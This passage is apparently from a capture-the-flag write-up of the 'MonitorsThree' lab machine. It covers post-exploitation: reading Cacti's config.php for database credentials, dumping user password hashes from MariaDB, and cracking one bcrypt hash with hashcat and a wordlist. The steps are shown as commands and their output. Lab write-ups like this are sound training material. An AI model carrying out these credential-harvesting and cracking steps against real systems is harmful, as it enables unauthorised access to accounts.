Cacti DB

Checking for web configuration file after performing a basic system enumeration

www-data@monitorsthree:~/html/cacti/include$ ll 
total 620K
4.0K drwxr-xr-x 20 www-data www-data 4.0K May 18 21:56 ..
4.0K drwxr-xr-x  9 www-data www-data 4.0K May 18 21:47 .
4.0K drwxr-xr-x  2 www-data www-data 4.0K May 18 21:47 touch
8.0K -rw-r--r--  1 www-data www-data 6.8K May 18 21:46 config.php
 12K -rw-r--r--  1 www-data www-data  11K Dec 20  2023 auth.php
4.0K -rw-r--r--  1 www-data www-data 1.7K Dec 20  2023 bottom_footer.php
4.0K -rw-r--r--  1 www-data www-data    7 Dec 20  2023 cacti_version
4.0K -rw-r--r--  1 www-data www-data 2.1K Dec 20  2023 cli_check.php
8.0K -rw-r--r--  1 www-data www-data 6.8K Dec 20  2023 config.php.dist
4.0K drwxr-xr-x  2 www-data www-data 4.0K Dec 20  2023 content
4.0K -rw-r--r--  1 www-data www-data 2.6K Dec 20  2023 csrf.php
4.0K drwxr-xr-x 10 www-data www-data 4.0K Dec 20  2023 fa
4.0K drwxr-xr-x  2 www-data www-data 4.0K Dec 20  2023 fonts
 24K -rw-r--r--  1 www-data www-data  21K Dec 20  2023 global.php
 84K -rw-r--r--  1 www-data www-data  84K Dec 20  2023 global_arrays.php
 16K -rw-r--r--  1 www-data www-data  16K Dec 20  2023 global_constants.php
 84K -rw-r--r--  1 www-data www-data  82K Dec 20  2023 global_form.php
 36K -rw-r--r--  1 www-data www-data  34K Dec 20  2023 global_languages.php
8.0K -rw-r--r--  1 www-data www-data 6.3K Dec 20  2023 global_session.php
116K -rw-r--r--  1 www-data www-data 115K Dec 20  2023 global_settings.php
4.0K -rw-r--r--  1 www-data www-data 1.6K Dec 20  2023 index.php
4.0K drwxr-xr-x  3 www-data www-data 4.0K Dec 20  2023 js
132K -rw-r--r--  1 www-data www-data 130K Dec 20  2023 layout.js
4.0K -rw-r--r--  1 www-data www-data 1.9K Dec 20  2023 plugins.php
 12K -rw-r--r--  1 www-data www-data 9.6K Dec 20  2023 realtime.js
8.0K -rw-r--r--  1 www-data www-data 4.5K Dec 20  2023 session.php
4.0K drwxr-xr-x  9 www-data www-data 4.0K Dec 20  2023 themes
4.0K -rw-r--r--  1 www-data www-data 3.3K Dec 20  2023 top_general_header.php
4.0K -rw-r--r--  1 www-data www-data 3.2K Dec 20  2023 top_graph_header.php
4.0K -rw-r--r--  1 www-data www-data 3.2K Dec 20  2023 top_header.php
4.0K drwxr-xr-x 11 www-data www-data 4.0K Dec 20  2023 vendor

The cacti/include directory contains a configuration file; config.php

www-data@monitorsthree:~/html/cacti/include$ cat config.php
<?php
/*
 +-------------------------------------------------------------------------+
 | Copyright (C) 2004-2023 The Cacti Group                                 |
 |                                                                         |
 | This program is free software; you can redistribute it and/or           |
 | modify it under the terms of the GNU General Public License             |
 | as published by the Free Software Foundation; either version 2          |
 | of the License, or (at your option) any later version.                  |
 |                                                                         |
 | This program is distributed in the hope that it will be useful,         |
 | but WITHOUT ANY WARRANTY; without even the implied warranty of          |
 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the           |
 | GNU General Public License for more details.                            |
 +-------------------------------------------------------------------------+
 | Cacti: The Complete RRDtool-based Graphing Solution                     |
 +-------------------------------------------------------------------------+
 | This code is designed, written, and maintained by the Cacti Group. See  |
 | about.php and/or the AUTHORS file for specific developer information.   |
 +-------------------------------------------------------------------------+
 | http://www.cacti.net/                                                   |
 +-------------------------------------------------------------------------+
*/
 
/**
 * Make sure these values reflect your actual database/host/user/password
 */
 
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;
 
[...REDACTED...]

DB Credential acquired; cactiuser:cactiuser

MySQL

www-data@monitorsthree:~/html/cacti/include$ mysql -ucactiuser -pcactiuser
mysql -ucactiuser -pcactiuser
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 67287
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

Session established

MariaDB [(none)]> shoshow databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| cacti              |
| information_schema |
| mysql              |
+--------------------+
3 rows in set (0.001 sec)
 
MariaDB [(none)]> useuse cacti;
use cacti;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

cacti

MariaDB [cacti]> select username,password from user_auth;
select username,password from user_auth;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |
| guest    | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |
| marcus   | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |
+----------+--------------------------------------------------------------+
3 rows in set (0.000 sec)

Credential hashes acquired marcus is a valid system user

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ hashcat -a 0 -m 3200 marcus.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK:12345678910
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIa...9IBjtK
Time.Started.....: Sun Aug 25 19:59:29 2024 (3 secs)
Time.Estimated...: Sun Aug 25 19:59:32 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      193 H/s (10.00ms) @ Accel:12 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 576/14344385 (0.00%)
Rejected.........: 0/576 (0.00%)
Restore.Point....: 432/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678910 -> parola
Hardware.Mon.#1..: Util: 85%
 
Started: Sun Aug 25 19:58:57 2024
Stopped: Sun Aug 25 19:59:34 2024

Password hash cracked for the marcus user; 12345678910 The password might be reused.

InfoSec LAB

Explorer

MonitorsThree_Cacti_DB

Cacti DB

MySQL

Password Cracking

Interactive Graph View

Table of Contents

Backlinks